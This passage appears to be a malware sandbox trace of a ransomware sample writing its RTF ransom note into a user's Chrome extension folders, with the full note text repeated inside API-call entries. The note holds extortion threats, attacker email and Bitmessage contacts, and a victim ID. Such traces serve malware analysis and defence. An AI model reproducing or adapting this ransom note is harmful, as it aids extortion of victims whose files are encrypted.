\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0287.705] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0287.705] CloseHandle (hObject=0x2f0) returned 1 [0287.705] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\#readme_eman#.rtf")) returned 0xffffffff [0287.705] GetLastError () returned 0x2 [0287.705] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0287.706] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0287.706] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 